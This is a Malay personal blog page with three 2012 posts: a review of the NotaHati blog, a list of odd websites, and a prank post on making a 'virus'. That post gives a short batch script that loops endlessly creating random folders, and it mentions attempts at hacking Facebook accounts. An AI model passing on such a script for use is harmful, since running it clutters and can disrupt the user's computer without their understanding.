Thursday, April 26, 2012

Contest Review dan Promo NotaHati

 
  Klik gambar diatas untuk join...

Hari ini  aku terpanggil untuk menyertai Contest Review dan Promo NotaHati.Pemilik blog NotaHati adalah Ini Acul (Mohd Rasul).

Apa itu Nota Hati? NotaHati adalah sebuah laman blog yang mengetengahkan maklumat mengenai dunia lelaki dan wanita seperti tip penjagaan, penampilan, cinta, fesyen, kerjaya dan sebagainya yang boleh dijadikan rujukan dan diamalkan bersama.Maksud NotaHati adalah coretan hati perasaan manusia diantara satu sama lain.

Baiklah. Apa gambaran yang ada di dalam fikiran anda mengenai blog NotaHati.com ? Apa yang aku nak review adalah gaya penulisannya yang menarik serta diolah dengan kemas disamping kandungan entri didalam artikel ada pelbagai maklumat,tips,memberikan motivasi   dan mempunyai unsur-unsur pengajaran.Disamping itu,template dalam  blog sesuai dengan warna yang dipilih dan tersusun.

Antara artikel yang menarik perhatian aku  adalah kategori motivasi.Contohnya,antara artikel yang aku minat adalah  mengenai Bagaimana menangani tekanan hidup dan kerja dan 5 tips Bagaimana menghadapi realiti alam pekerjaan.Tips yang diberikan  sangat berguna  kepada individu yang bekerja untuk digunakan sebagai persediaan dan langkah positif untuk bergerak kehadapan. Nak bagi cadangan sedikit adalah lagi bagus jika blog NotaHati ada memberi reward kepada pembaca yang selalu datang ke blog.

OK.Cukup sampai ini sahaja.
Jom singgah di blog NotaHati....http://www.notahati.com/

Sekian,terima kasih.


Monday, April 23, 2012

Cara-cara Buat Virus Berjangkit!!!!!!


Assalamualaikum..

         Wow!! Menarik sungguh.Aku kagum dengan mereka yang pakar dalam bidang hack ni.Aku sebenarnya berminat juga ingin belajar serba sedikit selok belok dunia hack ini.Tapi nak belajar hack ini bukan senang.Ianya memerlukan kepakaran teknikal yang tinggi disamping kesabaran yang tinggi.Sebab tu kebanyakan hacker jarang untuk  berkongsi.Mengapa??Ada yang bagitau  untuk menjadi hacker yang berkesan perlulah belajar cari sendiri maklumat disamping  mendapat sesuatu ilmu itu dengan praktik, usaha sendiri dan mencuba sehingga berjaya.Bukan senang..sebab tu berapa banyak masa diorang dihabiskan untuk memperoleh ilmu hack ni sampai berjaya.

Ada satu kisah itu yang aku dengar seorang hacker hebat yang belajar di Universiti Teknologi Petronas selalu menghabiskan masanya tiap-tiap hari hanya di hadapan komputer untuk hack.Aku  ada juga mencuba hack ni  seperti teknik nak hack fb tapi masih tak berjaya..banyak masa aku dihabiskan.. sesiapa yang ingin belajar hack ini tidak boleh cepat putus asa..perlu mencuba sampailah berjaya .

        Korang tau apa itu virus??Virus komputer ialah sejenis program komputer yang dicipta untuk melakukan kerosakan pada sesebuah sistem komputer.Kali ini aku nak bagi tips bagaimana nak buat virus berjangkit.Haha..Sebenarnya virus ini adalah virus tipu-tipu atau dalam erti kata lain ialah  virus ini akan menambah folder apabila diklik..Contoh gambar dibawah..

     Setelah berani mencuba akhirnya menjadi juga akhirmya..tapi terbuat di laptop aku sendiri..wakaka..Adoii..tak tau macam mana nak hilangkan banyak folder ni.tak diajar pulak cara nak hilangkan.Kena delete semua la nampaknya..
Cara membuat virus ini:

Step 1.Buka notepad korang pastu korang copy paste koding dibawah:
@echo off
color 0a
:eh
md %random%
goto eh

lepas copy paste tu ,korang save dengan apa-apa nama sekalipun tetapi dengan syarat mesti                       fail. bat.Contohnya kerusi.bat

Perhatian!!! 
Aku tidak akan bertanggungjawab sekiranya terjadi apa-apa di komputer korang.

P/S: Apa yang aku tau ada macam-macam  jenis virus yang merbahaya seperti virus pemusnah .Jadi korang janganlah cuba-cuba klik kalau tak berani menanggung risiko.Rosak pulak nanti komputer korang.
Rujukan: john-komputer.blogspot.com/

Tuesday, April 03, 2012

Laman Web yang Pelik

Assalamualaikum dan selamat sejahtera..
Pelik ...ada macam-macam web yang pelik..Korang nampak tak gambar kat tepi tu..cuba fokus kat titik tengah tu.ikut arahan tulisan tu..pelik ke??...aku ambil benda tu dalam internet.. 
Penggunaan Internet dalam era globalisasi sangat meluas dan berguna.Macam-macam maklumat boleh dapat  baik yang positif mahupun negatif. Buatlah pilihan yang baik.Internet memang  bagus, tidak syak tentang itu..iaitu mempunyai  pelbagai cara membantu orang(pengguna) mencari maklumat , dengan enjin carian seperti Google. Tetapi… sekali-sekala, ada laman web yang benar-benar pelik,aneh muncul dan berusaha untuk menarik  sedikit perhatian anda...

Dulu aku ada buat entri mengenai undang-undang pelik di dunia.  
Jadi,aku dah bosan tak tau nak updated apa, pergi mencari apa-apa cerita menarik di internet. Aku  ada jumpa  web yang pelik dan aneh.Siapa la yang buat web macam tu..Apa motif??Mungkin diorang dah bosan kot..Ini antaranya ada 10 web  aku pilih  yang pelik dan aneh: 


1) http://www.dontclick.it/
-jangan tekan..tapi ada maklumat dalam ni..

2)http://www.futureme.org/  
-dalam ni boleh hantar email kepada future.org apa yang anda mahu kata mengenai diri anda masa depan..

 3)http://www.biglongnow.com/
 - bila buka  pintu ada lagi pintu...

4)http://trololololololololololo.com/
-hmm pelik ...ada orang nyanyi trolololololo..

5)http://piv.pivpiv.dk/
-haha...cuba  buka..ada suara you are an idiot..

6)http://www.wwwdotcom.com/
-Perhatian!!!!

7)www.zimm-co.com/PressTheSpaceBar/pressthespacebar2000.html
-tekan spacebar.....dapatkan mata tertinggi..

8)http://www.crazythoughts.com/
-dalam ni ada macam-macam soalan pelik...

9)http://www.members.shaw.ca/gf3/circle-the-cat.html
-yang ni memang susah..macam mana nak kepung kucing tu??

10)http://www.howmanygoats.com/
-hairan??jawab kuiz dalam ni..

Ada banyak lagi sebenarnya..cukuplah tu..dalam internet ni macam-macam ada..

P/S:Hmm..kenapa??...ramai juga orang cari dalam internet maklumat yang pelik-pelik...

Rujukan:www.the-top-tens.com